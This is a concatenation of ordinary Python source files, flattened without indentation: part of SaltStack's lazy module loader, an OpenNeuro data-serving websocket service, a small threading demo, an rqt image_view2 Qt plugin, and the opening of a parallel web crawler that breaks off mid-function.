opt_match = []
def _replace_pre_ext(obj):
"""
Hack so we can get the optimization level that we replaced (if
any) out of the re.sub call below. We use a list here because
it is a persistent data structure that we will be able to
access after re.sub is called.
"""
opt_match.append(obj)
return ""
for mod_dir in self.module_dirs:
try:
# Make sure we have a sorted listdir in order to have
# predictable override results
files = sorted(x for x in os.listdir(mod_dir) if x != "__pycache__")
except OSError:
continue # Next mod_dir
try:
pycache_files = [
os.path.join("__pycache__", x)
for x in sorted(os.listdir(os.path.join(mod_dir, "__pycache__")))
]
except OSError:
pass
else:
files.extend(pycache_files)
for filename in files:
try:
dirname, basename = os.path.split(filename)
if basename.startswith("_"):
# skip private modules
# log messages omitted for obviousness
continue # Next filename
f_noext, ext = os.path.splitext(basename)
f_noext = PY3_PRE_EXT.sub(_replace_pre_ext, f_noext)
try:
opt_level = int(opt_match.pop().group(1).rsplit("-", 1)[-1])
except (AttributeError, IndexError, ValueError):
# No regex match or no optimization level matched
opt_level = 0
try:
opt_index = self.opts["optimization_order"].index(opt_level)
except KeyError:
log.trace(
"Disallowed optimization level %d for module "
"name '%s', skipping. Add %d to the "
"'optimization_order' config option if you "
"do not want to ignore this optimization "
"level.",
opt_level,
f_noext,
opt_level,
)
continue
# make sure it is a suffix we support
if ext not in self.suffix_map:
continue # Next filename
if f_noext in self.disabled:
log.trace(
"Skipping %s, it is disabled by configuration", filename
)
continue # Next filename
fpath = os.path.join(mod_dir, filename)
# if its a directory, lets allow us to load that
if ext == "":
# is there something __init__?
subfiles = os.listdir(fpath)
for suffix in self.suffix_order:
if "" == suffix:
continue # Next suffix (__init__ must have a suffix)
init_file = "__init__{}".format(suffix)
if init_file in subfiles:
break
else:
continue # Next filename
try:
curr_ext = self.file_mapping[f_noext][1]
curr_opt_index = self.file_mapping[f_noext][2]
except KeyError:
pass
else:
if "" in (curr_ext, ext) and curr_ext != ext:
log.error(
"Module/package collision: '%s' and '%s'",
fpath,
self.file_mapping[f_noext][0],
)
if six.PY3 and ext == ".pyc" and curr_ext == ".pyc":
# Check the optimization level
if opt_index >= curr_opt_index:
# Module name match, but a higher-priority
# optimization level was already matched, skipping.
continue
elif not curr_ext or self.suffix_order.index(
ext
) >= self.suffix_order.index(curr_ext):
# Match found but a higher-priority match already
# exists, so skip this.
continue
if six.PY3 and not dirname and ext == ".pyc":
# On Python 3, we should only load .pyc files from the
# __pycache__ subdirectory (i.e. when dirname is not an
# empty string).
continue
# Made it this far - add it
self.file_mapping[f_noext] = (fpath, ext, opt_index)
except OSError:
continue
for smod in self.static_modules:
f_noext = smod.split(".")[-1]
self.file_mapping[f_noext] = (smod, ".o", 0)
def clear(self):
"""
Clear the dict
"""
with self._lock:
super().clear() # clear the lazy loader
self.loaded_files = set()
self.missing_modules = {}
self.loaded_modules = {}
# if we have been loaded before, lets clear the file mapping since
# we obviously want a re-do
if hasattr(self, "opts"):
self._refresh_file_mapping()
self.initial_load = False
def __prep_mod_opts(self, opts):
"""
Strip out of the opts any logger instance
"""
if "__grains__" not in self.pack:
grains = opts.get("grains", {})
if isinstance(grains, salt.loader_context.NamedLoaderContext):
grains = grains.value()
self.context_dict["grains"] = grains
self.pack["__grains__"] = salt.utils.context.NamespacedDictWrapper(
self.context_dict, "grains"
)
if "__pillar__" not in self.pack:
pillar = opts.get("pillar", {})
if isinstance(pillar, salt.loader_context.NamedLoaderContext):
pillar = pillar.value()
self.context_dict["pillar"] = pillar
self.pack["__pillar__"] = salt.utils.context.NamespacedDictWrapper(
self.context_dict, "pillar"
)
mod_opts = {}
for key, val in list(opts.items()):
if key == "logger":
continue
mod_opts[key] = val
return mod_opts
def _iter_files(self, mod_name):
"""
Iterate over all file_mapping files in order of closeness to mod_name
"""
# do we have an exact match?
if mod_name in self.file_mapping:
yield mod_name
# do we have a partial match?
for k in self.file_mapping:
if mod_name in k:
yield k
# anyone else? Bueller?
for k in self.file_mapping:
if mod_name not in k:
yield k
def _reload_submodules(self, mod):
submodules = (
getattr(mod, sname)
for sname in dir(mod)
if isinstance(getattr(mod, sname), mod.__class__)
)
# reload only custom "sub"modules
for submodule in submodules:
# it is a submodule if the name is in a namespace under mod
if submodule.__name__.startswith(mod.__name__ + "."):
reload_module(submodule)
self._reload_submodules(submodule)
def __populate_sys_path(self):
for directory in self.extra_module_dirs:
if directory not in sys.path:
sys.path.append(directory)
self._clean_module_dirs.append(directory)
def __clean_sys_path(self):
invalidate_path_importer_cache = False
for directory in self._clean_module_dirs:
if directory in sys.path:
sys.path.remove(directory)
invalidate_path_importer_cache = True
self._clean_module_dirs = []
# Be sure that sys.path_importer_cache does not contain any
# invalid FileFinder references
importlib.invalidate_caches()
# Because we are messing with importlib, from time to time we can
# hit an invalidation issue with sys.path_importer_cache that
# requires removing FileFinder entries that remain None for the
# extra_module_dirs
if invalidate_path_importer_cache:
for directory in self.extra_module_dirs:
if (
directory in sys.path_importer_cache
and sys.path_importer_cache[directory] is None
):
del sys.path_importer_cache[directory]
def _load_module(self, name):
mod = None
fpath, suffix = self.file_mapping[name][:2]
# if the fpath has `.cpython-3x` in it, but the running Py version
# is 3.y, the following will cause us to return immediately and we won't try to import this .pyc.
# This is for the unusual case where several Python versions share a single
# source tree and drop their .pycs in the same __pycache__ folder.
# If we were to load a .pyc for another Py version it's not a big problem
# but the log will get spammed with "Bad Magic Number" messages that
# can be very misleading if the user is debugging another problem.
try:
(implementation_tag, cache_tag_ver) = sys.implementation.cache_tag.split(
"-"
)
if cache_tag_ver not in fpath and implementation_tag in fpath:
log.trace(
"Trying to load %s on %s, returning False.",
fpath,
sys.implementation.cache_tag,
)
return False
except AttributeError:
# Most likely Py 2.7 or some other Python version we don't really support
pass
self.loaded_files.add(name)
fpath_dirname = os.path.dirname(fpath)
try:
self.__populate_sys_path()
sys.path.append(fpath_dirname)
if suffix == ".pyx":
mod = pyximport.load_module(name, fpath, tempfile.gettempdir())
elif suffix == ".o":
top_mod = __import__(fpath, globals(), locals(), [])
comps = fpath.split(".")
if len(comps) < 2:
mod = top_mod
else:
mod = top_mod
for subname in comps[1:]:
mod = getattr(mod, subname)
elif suffix == ".zip":
mod = zipimporter(fpath).load_module(name)
else:
desc = self.suffix_map[suffix]
# if it is a directory, we don't open a file
try:
mod_namespace = ".".join(
(
self.loaded_base_name,
self.mod_type_check(fpath),
self.tag,
name,
)
)
except TypeError:
mod_namespace = "{}.{}.{}.{}".format(
self.loaded_base_name,
self.mod_type_check(fpath),
self.tag,
name,
)
if suffix == "":
# pylint: disable=no-member
# Package directory, look for __init__
loader_details = [
(
importlib.machinery.SourceFileLoader,
importlib.machinery.SOURCE_SUFFIXES,
),
(
importlib.machinery.SourcelessFileLoader,
importlib.machinery.BYTECODE_SUFFIXES,
),
(
importlib.machinery.ExtensionFileLoader,
importlib.machinery.EXTENSION_SUFFIXES,
),
]
file_finder = importlib.machinery.FileFinder(
fpath_dirname, *loader_details
)
spec = file_finder.find_spec(mod_namespace)
if spec is None:
raise ImportError()
# TODO: Get rid of load_module in favor of
# exec_module below. load_module is deprecated, but
# loading using exec_module has been causing odd things
# with the magic dunders we pack into the loaded
# modules, most notably with salt-ssh's __opts__.
mod = spec.loader.load_module()
# mod = importlib.util.module_from_spec(spec)
# spec.loader.exec_module(mod)
# pylint: enable=no-member
sys.modules[mod_namespace] = mod
# reload all submodules if necessary
if not self.initial_load:
self._reload_submodules(mod)
else:
# pylint: disable=no-member
loader = MODULE_KIND_MAP[desc[2]](mod_namespace, fpath)
spec = importlib.util.spec_from_file_location(
mod_namespace, fpath, loader=loader
)
if spec is None:
raise ImportError()
# TODO: Get rid of load_module in favor of
# exec_module below. load_module is deprecated, but
# loading using exec_module has been causing odd things
# with the magic dunders we pack into the loaded
# modules, most notably with salt-ssh's __opts__.
mod = self.run(spec.loader.load_module)
# mod = importlib.util.module_from_spec(spec)
# spec.loader.exec_module(mod)
# pylint: enable=no-member
sys.modules[mod_namespace] = mod
except OSError:
raise
except ImportError as exc:
if "magic number" in str(exc):
error_msg = "Failed to import {} {}. Bad magic number. If migrating from Python2 to Python3, remove all .pyc files and try again.".format(
self.tag, name
)
log.warning(error_msg)
self.missing_modules[name] = error_msg
log.debug("Failed to import %s %s:\n", self.tag, name, exc_info=True)
self.missing_modules[name] = exc
return False
except Exception as error: # pylint: disable=broad-except
log.error(
"Failed to import %s %s, this is due most likely to a "
"syntax error:\n",
self.tag,
name,
exc_info=True,
)
self.missing_modules[name] = error
return False
except SystemExit as error:
try:
fn_, _, caller, _ = traceback.extract_tb(sys.exc_info()[2])[-1]
except Exception: # pylint: disable=broad-except
pass
else:
tgt_fn = os.path.join("salt", "utils", "process.py")
if fn_.endswith(tgt_fn) and "_handle_signals" in caller:
# Race condition, SIGTERM or SIGINT received while loader
# was in process of loading a module. Call sys.exit to
# ensure that the process is killed.
sys.exit(salt.defaults.exitcodes.EX_OK)
log.error(
"Failed to import %s %s as the module called exit()\n",
self.tag,
name,
exc_info=True,
)
self.missing_modules[name] = error
return False
finally:
sys.path.remove(fpath_dirname)
self.__clean_sys_path()
loader_context = salt.loader_context.LoaderContext()
if hasattr(mod, "__salt_loader__"):
if not isinstance(mod.__salt_loader__, salt.loader_context.LoaderContext):
log.warning("Override __salt_loader__: %s", mod)
mod.__salt_loader__ = loader_context
else:
mod.__salt_loader__ = loader_context
if hasattr(mod, "__opts__"):
if not isinstance(mod.__opts__, salt.loader_context.NamedLoaderContext):
if not hasattr(mod, "__orig_opts__"):
mod.__orig_opts__ = copy.deepcopy(mod.__opts__)
mod.__opts__ = copy.deepcopy(mod.__orig_opts__)
mod.__opts__.update(self.opts)
else:
if not hasattr(mod, "__orig_opts__"):
mod.__orig_opts__ = {}
mod.__opts__ = copy.deepcopy(mod.__orig_opts__)
mod.__opts__.update(self.opts)
# pack whatever other globals we were asked to
for p_name, p_value in self.pack.items():
mod_named_context = getattr(mod, p_name, None)
if hasattr(mod_named_context, "default"):
default = copy.deepcopy(mod_named_context.default)
else:
default = None
named_context = loader_context.named_context(p_name, default)
if mod_named_context is None:
setattr(mod, p_name, named_context)
elif named_context != mod_named_context:
log.debug("Override %s: %s", p_name, mod)
setattr(mod, p_name, named_context)
else:
setattr(mod, p_name, named_context)
if self.pack_self is not None:
mod_named_context = getattr(mod, self.pack_self, None)
if hasattr(mod_named_context, "default"):
default = copy.deepcopy(mod_named_context.default)
else:
default = None
named_context = loader_context.named_context(self.pack_self, default)
if mod_named_context is None:
setattr(mod, self.pack_self, named_context)
elif named_context != mod_named_context:
log.debug("Override %s: %s", self.pack_self, mod)
setattr(mod, self.pack_self, named_context)
else:
setattr(mod, self.pack_self, named_context)
module_name = mod.__name__.rsplit(".", 1)[-1]
# Call a module's initialization method if it exists
module_init = getattr(mod, "__init__", None)
if inspect.isfunction(module_init):
try:
self.run(module_init, self.opts)
except TypeError as e:
log.error(e)
except Exception: # pylint: disable=broad-except
err_string = "__init__ failed"
log.debug(
"Error loading %s.%s: %s",
self.tag,
module_name,
err_string,
exc_info=True,
)
self.missing_modules[module_name] = err_string
self.missing_modules[name] = err_string
return False
# if virtual modules are enabled, we need to look for the
# __virtual__() function inside that module and run it.
if self.virtual_enable:
virtual_funcs_to_process = ["__virtual__"] + self.virtual_funcs
for virtual_func in virtual_funcs_to_process:
(
virtual_ret,
module_name,
virtual_err,
virtual_aliases,
) = self._process_virtual(mod, module_name, virtual_func)
if virtual_err is not None:
log.trace(
"Error loading %s.%s: %s", self.tag, module_name, virtual_err
)
# if _process_virtual returned a non-True value then we are
# supposed to not process this module
if virtual_ret is not True and module_name not in self.missing_modules:
# If a module has information about why it could not be loaded, record it
self.missing_modules[module_name] = virtual_err
self.missing_modules[name] = virtual_err
return False
else:
virtual_aliases = ()
# If this is a proxy minion then MOST modules cannot work. Therefore, require that
# any module that does work with salt-proxy-minion define __proxyenabled__ as a list
# containing the names of the proxy types that the module supports.
#
# Render modules and state modules are OK though
if "proxy" in self.opts:
if self.tag in ["grains", "proxy"]:
if not hasattr(mod, "__proxyenabled__") or (
self.opts["proxy"]["proxytype"] not in mod.__proxyenabled__
and "*" not in mod.__proxyenabled__
):
err_string = "not a proxy_minion enabled module"
self.missing_modules[module_name] = err_string
self.missing_modules[name] = err_string
return False
if getattr(mod, "__load__", False) is not False:
log.info(
"The functions from module '%s' are being loaded from the "
"provided __load__ attribute",
module_name,
)
# If we had another module by the same virtual name, we should put any
# new functions under the existing dictionary.
mod_names = [module_name] + list(virtual_aliases)
mod_dict = {
x: self.loaded_modules.get(x, self.mod_dict_class()) for x in mod_names
}
for attr in getattr(mod, "__load__", dir(mod)):
if attr.startswith("_"):
# private functions are skipped
continue
func = getattr(mod, attr)
if not inspect.isfunction(func) and not isinstance(func, functools.partial):
# Not a function!? Skip it!!!
continue
# Let's get the function name.
# If the module has the __func_alias__ attribute, it must be a
# dictionary mapping in the form of (key -> value):
# <real-func-name> -> <desired-func-name>
#
# It defaults, of course, to the found callable attribute name
# if no alias is defined.
funcname = getattr(mod, "__func_alias__", {}).get(attr, attr)
for tgt_mod in mod_names:
try:
full_funcname = ".".join((tgt_mod, funcname))
except TypeError:
full_funcname = "{}.{}".format(tgt_mod, funcname)
# Save many references for lookups
# Careful not to overwrite existing (higher priority) functions
if full_funcname not in self._dict:
self._dict[full_funcname] = func
if funcname not in mod_dict[tgt_mod]:
setattr(mod_dict[tgt_mod], funcname, func)
mod_dict[tgt_mod][funcname] = func
self._apply_outputter(func, mod)
# enforce depends
try:
Depends.enforce_dependencies(self._dict, self.tag, name)
except RuntimeError as exc:
log.info(
"Depends.enforce_dependencies() failed for the following " "reason: %s",
exc,
)
for tgt_mod in mod_names:
self.loaded_modules[tgt_mod] = mod_dict[tgt_mod]
return True
def _load(self, key):
"""
Load a single item if you have it
"""
# if the key doesn't have a '.' then it isn't valid for this mod dict
if not isinstance(key, str):
raise KeyError("The key must be a string.")
if "." not in key:
raise KeyError("The key '{}' should contain a '.'".format(key))
mod_name, _ = key.split(".", 1)
with self._lock:
# It is possible that the key is in the dictionary after
# acquiring the lock due to another thread loading it.
if mod_name in self.missing_modules or key in self._dict:
return True
# if the modulename isn't in the whitelist, don't bother
if self.whitelist and mod_name not in self.whitelist:
log.error(
"Failed to load function %s because its module (%s) is "
"not in the whitelist: %s",
key,
mod_name,
self.whitelist,
)
raise KeyError(key)
def _inner_load(mod_name):
for name in self._iter_files(mod_name):
if name in self.loaded_files:
continue
# if we got what we wanted, we are done
if self._load_module(name) and key in self._dict:
return True
return False
# try to load the module
ret = None
reloaded = False
# re-scan up to once, IOErrors or a failed load cause re-scans of the
# filesystem
while True:
try:
ret = _inner_load(mod_name)
if not reloaded and ret is not True:
self._refresh_file_mapping()
reloaded = True
continue
break
except OSError:
if not reloaded:
self._refresh_file_mapping()
reloaded = True
continue
return ret
def _load_all(self):
"""
Load all of them
"""
with self._lock:
for name in self.file_mapping:
if name in self.loaded_files or name in self.missing_modules:
continue
self._load_module(name)
self.loaded = True
def reload_modules(self):
with self._lock:
self.loaded_files = set()
self._load_all()
def _apply_outputter(self, func, mod):
"""
Apply the __outputter__ variable to the functions
"""
if hasattr(mod, "__outputter__"):
outp = mod.__outputter__
if func.__name__ in outp:
func.__outputter__ = outp[func.__name__]
def _process_virtual(self, mod, module_name, virtual_func="__virtual__"):
"""
Given a loaded module and its default name determine its virtual name
This function returns a tuple. The first value will be either True or
False and will indicate if the module should be loaded or not (i.e. if
        it threw an exception while processing its __virtual__ function). The
second value is the determined virtual name, which may be the same as
the value provided.
The default name can be calculated as follows::
module_name = mod.__name__.rsplit('.', 1)[-1]
"""
# The __virtual__ function will return either a True or False value.
# If it returns a True value it can also set a module level attribute
# named __virtualname__ with the name that the module should be
# referred to as.
#
# This allows us to have things like the pkg module working on all
# platforms under the name 'pkg'. It also allows for modules like
# augeas_cfg to be referred to as 'augeas', which would otherwise have
# namespace collisions. And finally it allows modules to return False
# if they are not intended to run on the given platform or are missing
# dependencies.
virtual_aliases = getattr(mod, "__virtual_aliases__", tuple())
try:
error_reason = None
if hasattr(mod, "__virtual__") and inspect.isfunction(mod.__virtual__):
try:
start = time.time()
virtual_attr = getattr(mod, virtual_func)
virtual = self.run(virtual_attr)
if isinstance(virtual, tuple):
error_reason = virtual[1]
virtual = virtual[0]
if self.opts.get("virtual_timer", False):
end = time.time() - start
msg = "Virtual function took {} seconds for {}".format(
end, module_name
)
log.warning(msg)
except Exception as exc: # pylint: disable=broad-except
error_reason = (
"Exception raised when processing __virtual__ function"
" for {}. Module will not be loaded: {}".format(
mod.__name__, exc
)
)
log.error(error_reason, exc_info_on_loglevel=logging.DEBUG)
virtual = None
# Get the module's virtual name
virtualname = getattr(mod, "__virtualname__", virtual)
if not virtual:
# if __virtual__() evaluates to False then the module
# wasn't meant for this platform or it's not supposed to
# load for some other reason.
# Some modules might accidentally return None and are
# improperly loaded
if virtual is None:
log.warning(
"%s.__virtual__() is wrongly returning `None`. "
"It should either return `True`, `False` or a new "
"name. If you're the developer of the module "
"'%s', please fix this.",
mod.__name__,
module_name,
)
return (False, module_name, error_reason, virtual_aliases)
# At this point, __virtual__ did not return a
# boolean value, let's check for deprecated usage
# or module renames
if virtual is not True and module_name != virtual:
# The module is renaming itself. Updating the module name
# with the new name
log.trace("Loaded %s as virtual %s", module_name, virtual)
if virtualname != virtual:
# The __virtualname__ attribute does not match what's
# being returned by the __virtual__() function. This
# should be considered an error.
log.error(
"The module '%s' is showing some bad usage. Its "
"__virtualname__ attribute is set to '%s' yet the "
"__virtual__() function is returning '%s'. These "
"values should match!",
mod.__name__,
virtualname,
virtual,
)
module_name = virtualname
# If the __virtual__ function returns True and __virtualname__
# is set then use it
elif virtual is True and virtualname != module_name:
if virtualname is not True:
module_name = virtualname
except KeyError:
# Key errors come out of the virtual function when passing
# in incomplete grains sets, these can be safely ignored
# and logged to debug, still, it includes the traceback to
# help debugging.
log.debug("KeyError when loading %s", module_name, exc_info=True)
except Exception: # pylint: disable=broad-except
# If the module throws an exception during __virtual__()
# then log the information and continue to the next.
log.error(
"Failed to read the virtual function for %s: %s",
self.tag,
module_name,
exc_info=True,
)
return (False, module_name, error_reason, virtual_aliases)
return (True, module_name, None, virtual_aliases)
def run(self, _func_or_method, *args, **kwargs):
"""
Run the `_func_or_method` in this loader's context
"""
self._last_context = contextvars.copy_context()
return self._last_context.run(self._run_as, _func_or_method, *args, **kwargs)
def _run_as(self, _func_or_method, *args, **kwargs):
"""
Handle setting up the context properly and call the method
"""
self.parent_loader = None
try:
current_loader = salt.loader_context.loader_ctxvar.get()
except LookupError:
current_loader = None
if current_loader is not self:
self.parent_loader = current_loader
token = salt.loader_context.loader_ctxvar.set(self)
try:
return _func_or_method(*args, **kwargs)
finally:
self.parent_loader = None
salt.loader_context.loader_ctxvar.reset(token)
def run_in_thread(self, _func_or_method, *args, **kwargs):
"""
Run the function in a new thread with the context of this loader
"""
argslist = [self, _func_or_method]
argslist.extend(args)
thread = threading.Thread(target=self.target, args=argslist, kwargs=kwargs)
thread.start()
return thread
@staticmethod
def target(loader, _func_or_method, *args, **kwargs):
loader.run(_func_or_method, *args, **kwargs)
def global_injector_decorator(inject_globals):
"""
Decorator used by the LazyLoader to inject globals into a function at
execute time.
globals
Dictionary with global variables to inject
"""
def inner_decorator(f):
@functools.wraps(f)
def wrapper(*args, **kwargs):
with salt.utils.context.func_globals_inject(f, **inject_globals):
return f(*args, **kwargs)
return wrapper
return inner_decorator
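

# Illustrative usage sketch (not part of Salt's loader): exercising
# global_injector_decorator above on a plain function. The injected name
# "__grains__" and its value are made up for this demo; the loader normally
# injects dunders such as __salt__, __opts__ and __grains__ at call time.
if __name__ == "__main__":

    @global_injector_decorator({"__grains__": {"os": "Linux"}})
    def _injection_demo():
        # __grains__ only exists in this function's globals while the wrapper runs
        return __grains__["os"]

    print(_injection_demo())  # expected output: Linux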
|
openNeuroService.py
|
"""
A command-line service to be run where the OpenNeuro data is downloaded and cached.
This service instantiates a BidsInterface object for serving the data back to the client
running in the cloud. It connects to the remote projectServer.
Once a connection is established it waits for requests and invokes the BidsInterface
functions to handle them.
"""
import os
import logging
import threading
from rtCommon.bidsInterface import BidsInterface
from rtCommon.wsRemoteService import WsRemoteService, parseConnectionArgs
from rtCommon.utils import installLoggers
class OpenNeuroService:
"""
A class that implements the OpenNeuroService by instantiating a BidsInterface, connecting
to the remote projectServer and servicing requests to the BidsInterface.
"""
def __init__(self, args, webSocketChannelName='wsData'):
"""
Uses the WsRemoteService framework to parse connection-related args and establish
a connection to a remote projectServer. Instantiates a local version of BidsInterface
to handle client requests coming from the projectServer connection.
Args:
args: Argparse args related to connecting to the remote server. These include
"-s <server>", "-u <username>", "-p <password>", "--test",
"-i <retry-connection-interval>"
            webSocketChannelName: The websocket url extension used to connect and communicate
to the remote projectServer, e.g. 'wsData' would connect to 'ws://server:port/wsData'
"""
        # Not necessary to set the allowedDirs for BidsInterface here because we won't be
# using the DicomToBidsStream interface, leave it as none allowed (default)
self.bidsInterface = BidsInterface(dataRemote=False)
self.wsRemoteService = WsRemoteService(args, webSocketChannelName)
self.wsRemoteService.addHandlerClass(BidsInterface, self.bidsInterface)
def runDetached(self):
"""Starts the receiver in it's own thread."""
self.recvThread = threading.Thread(name='recvThread',
target=self.wsRemoteService.runForever)
        self.recvThread.daemon = True
self.recvThread.start()
if __name__ == "__main__":
installLoggers(logging.INFO, logging.INFO, filename='logs/OpenNeuroService.log')
# parse connection args
connectionArgs = parseConnectionArgs()
try:
openNeuroService = OpenNeuroService(connectionArgs)
# Use this command to run the service and not return control
openNeuroService.wsRemoteService.runForever()
# Alternately use this command to start the service in a thread and
# return control to main.
# openNeuroService.runDetached()
except Exception as err:
print(f'Exception: {err}')
|
threading_global_1.py
|
#!/usr/bin/env python3
import threading
import time
import random
mylist = [ ]
def hello(n):
time.sleep(random.randint(1,3))
mylist.append(threading.get_ident()) # bad in real code!
print("[{0}] Hello!".format(n))
threads = [ ]
for i in range(10):
t = threading.Thread(target=hello, args=(i,))
threads.append(t)
t.start()
for one_thread in threads:
one_thread.join()
print("Done!")
print(len(mylist))
print(mylist)
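
# Follow-up sketch for the demo above (assumption: the "bad in real code!" remark
# refers to mutating shared state from many threads). list.append is atomic under
# CPython's GIL, but an explicit Lock keeps the code correct if the shared update
# ever becomes more than a single append.
locked_list = []
list_lock = threading.Lock()

def hello_locked(n):
    time.sleep(random.randint(1, 3))
    with list_lock:  # serialize access to the shared list
        locked_list.append(threading.get_ident())
    print("[{0}] Hello (locked)!".format(n))

locked_threads = [threading.Thread(target=hello_locked, args=(i,)) for i in range(10)]
for t in locked_threads:
    t.start()
for t in locked_threads:
    t.join()
print("Done (locked)!")
print(len(locked_list))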
|
image_view2_wrapper.py
|
from rqt_gui_py.plugin import Plugin
import python_qt_binding.QtGui as QtGui
from python_qt_binding.QtGui import (QAction, QIcon, QMenu, QWidget,
QPainter, QColor, QFont, QBrush,
QPen, QMessageBox, QSizePolicy,
QImage, QPixmap, qRgb, QComboBox,
QDialog, QPushButton)
from python_qt_binding.QtCore import (Qt, QTimer, qWarning, Slot,
QEvent, QSize, pyqtSignal,
pyqtSlot)
from threading import Lock, Thread
import rospy
import python_qt_binding.QtCore as QtCore
from std_msgs.msg import Bool, Time
import time
import math
from resource_retriever import get_filename
import yaml
import os, sys
import numpy as np
import cv2, cv
from cv_bridge import CvBridge, CvBridgeError
from image_view2.msg import MouseEvent
from sensor_msgs.msg import Image
class ComboBoxDialog(QDialog):
def __init__(self, parent=None):
super(ComboBoxDialog, self).__init__()
self.number = 0
vbox = QtGui.QVBoxLayout(self)
self.combo_box = QComboBox(self)
self.combo_box.activated.connect(self.onActivated)
vbox.addWidget(self.combo_box)
button = QPushButton()
button.setText("Done")
button.clicked.connect(self.buttonCallback)
vbox.addWidget(button)
self.setLayout(vbox)
def buttonCallback(self, event):
self.close()
def onActivated(self, number):
self.number = number
class ImageView2Plugin(Plugin):
"""
rqt wrapper for image_view2
"""
def __init__(self, context):
super(ImageView2Plugin, self).__init__(context)
self.setObjectName("ImageView2Plugin")
self._widget = ImageView2Widget()
context.add_widget(self._widget)
def save_settings(self, plugin_settings, instance_settings):
self._widget.save_settings(plugin_settings, instance_settings)
def restore_settings(self, plugin_settings, instance_settings):
self._widget.restore_settings(plugin_settings, instance_settings)
def trigger_configuration(self):
self._widget.trigger_configuration()
class ScaledLabel(QtGui.QLabel):
def __init__(self, *args, **kwargs):
QtGui.QLabel.__init__(self)
self._pixmap = QtGui.QPixmap(self.pixmap())
def resizeEvent(self, event):
self.setPixmap(self._pixmap.scaled(
self.width(), self.height(),
QtCore.Qt.KeepAspectRatio))
class ImageView2Widget(QWidget):
"""
Qt widget to communicate with image_view2
"""
cv_image = None
pixmap = None
repaint_trigger = pyqtSignal()
def __init__(self):
super(ImageView2Widget, self).__init__()
self.left_button_clicked = False
self.repaint_trigger.connect(self.redraw)
self.lock = Lock()
self.need_to_rewrite = False
self.bridge = CvBridge()
self.image_sub = None
self.event_pub = None
self.label = ScaledLabel()
self.label.setAlignment(Qt.AlignCenter)
self.label.setSizePolicy(QSizePolicy(QSizePolicy.Ignored, QSizePolicy.Ignored))
#self.label.installEventFilter(self)
vbox = QtGui.QVBoxLayout(self)
vbox.addWidget(self.label)
self.setLayout(vbox)
self._image_topics = []
self._update_topic_thread = Thread(target=self.updateTopics)
self._update_topic_thread.start()
self._active_topic = None
self.setMouseTracking(True)
self.label.setMouseTracking(True)
self._dialog = ComboBoxDialog()
self.show()
def trigger_configuration(self):
self._dialog.exec_()
self.setupSubscriber(self._image_topics[self._dialog.number])
def setupSubscriber(self, topic):
if self.image_sub:
self.image_sub.unregister()
rospy.loginfo("Subscribing %s" % (topic + "/marked"))
self.image_sub = rospy.Subscriber(topic + "/marked",
Image,
self.imageCallback)
self.event_pub = rospy.Publisher(topic + "/event", MouseEvent)
self._active_topic = topic
def onActivated(self, number):
self.setupSubscriber(self._image_topics[number])
def imageCallback(self, msg):
with self.lock:
if msg.width == 0 or msg.height == 0:
rospy.logdebug("Looks input images is invalid")
return
cv_image = self.bridge.imgmsg_to_cv2(msg, msg.encoding)
if msg.encoding == "bgr8":
self.cv_image = cv2.cvtColor(cv_image, cv2.COLOR_BGR2RGB)
elif msg.encoding == "rgb8":
self.cv_image = cv_image
self.numpy_image = np.asarray(self.cv_image)
self.need_to_rewrite = True
self.repaint_trigger.emit()
def updateTopics(self):
need_to_update = False
for (topic, topic_type) in rospy.get_published_topics():
if topic_type == "sensor_msgs/Image":
with self.lock:
if not topic in self._image_topics:
self._image_topics.append(topic)
need_to_update = True
if need_to_update:
with self.lock:
self._image_topics = sorted(self._image_topics)
self._dialog.combo_box.clear()
for topic in self._image_topics:
self._dialog.combo_box.addItem(topic)
if self._active_topic:
self._dialog.combo_box.setCurrentIndex(self._image_topics.index(self._active_topic))
time.sleep(1)
@pyqtSlot()
def redraw(self):
with self.lock:
if not self.need_to_rewrite:
return
            if self.cv_image is not None:
size = self.cv_image.shape
img = QImage(self.cv_image.data,
size[1], size[0], size[2] * size[1],
QImage.Format_RGB888)
# convert to QPixmap
self.pixmap = QPixmap(size[1], size[0])
self.pixmap.convertFromImage(img)
self.label.setPixmap(self.pixmap.scaled(
self.label.width(), self.label.height(),
QtCore.Qt.KeepAspectRatio))
#self.label.setPixmap(self.pixmap)
def mousePosition(self, e):
label_x = self.label.x()
label_y = self.label.y()
label_width = self.label.width()
label_height = self.label.height()
pixmap_width = self.label.pixmap().width()
pixmap_height = self.label.pixmap().height()
x_offset = (label_width - pixmap_width) / 2.0 + label_x
y_offset = (label_height - pixmap_height) / 2.0 + label_y
return (e.x() - x_offset, e.y()- y_offset)
def mouseMoveEvent(self, e):
msg = MouseEvent()
msg.header.stamp = rospy.Time.now()
msg.type = MouseEvent.MOUSE_MOVE
msg.x, msg.y = self.mousePosition(e)
msg.width = self.label.pixmap().width()
msg.height = self.label.pixmap().height()
if self.event_pub:
self.event_pub.publish(msg)
def mousePressEvent(self, e):
msg = MouseEvent()
msg.header.stamp = rospy.Time.now()
if e.button() == Qt.LeftButton:
msg.type = MouseEvent.MOUSE_LEFT_DOWN
self.left_button_clicked = True
elif e.button() == Qt.RightButton:
msg.type = MouseEvent.MOUSE_RIGHT_DOWN
msg.width = self.label.pixmap().width()
msg.height = self.label.pixmap().height()
msg.x, msg.y = self.mousePosition(e)
if self.event_pub:
self.event_pub.publish(msg)
def mouseReleaseEvent(self, e):
if e.button() == Qt.LeftButton:
self.left_button_clicked = False
msg = MouseEvent()
msg.header.stamp = rospy.Time.now()
msg.width = self.label.pixmap().width()
msg.height = self.label.pixmap().height()
msg.type = MouseEvent.MOUSE_LEFT_UP
msg.x, msg.y = self.mousePosition(e)
if self.event_pub:
self.event_pub.publish(msg)
def save_settings(self, plugin_settings, instance_settings):
if self._active_topic:
instance_settings.set_value("active_topic", self._active_topic)
def restore_settings(self, plugin_settings, instance_settings):
if instance_settings.value("active_topic"):
topic = instance_settings.value("active_topic")
self._dialog.combo_box.addItem(topic)
self.setupSubscriber(topic)
|
e03parallel.py
|
#!/usr/bin/env python3
"""
./e03parallel.py http://camlistore.org 2
Found 37 urls
...
"""
from queue import Queue
from sys import argv
from threading import Thread
from e01extract import canonicalize, extract
from e02crawl import print_crawl
def crawl_parallel(start_url, max_depth):
fetch_queue = Queue() # (crawl_depth, url)
fetch_queue.put((0, canonicalize(start_url)))
seen_urls, result = set(), []
func = lambda: consumer(fetch_queue, max_depth, seen_urls, result)
for _ in range(3):
Thread(target=func, daemon=True).start()
fetch_queue.join()
return result
def consumer(fetch_queue, max_depth, seen_urls, result):
while True:
depth, url = fetch_queue.get()
try:
if depth > max_depth: continue
if url in seen_urls: continue # GIL :|
seen_urls.add(url) # GIL :/
try:
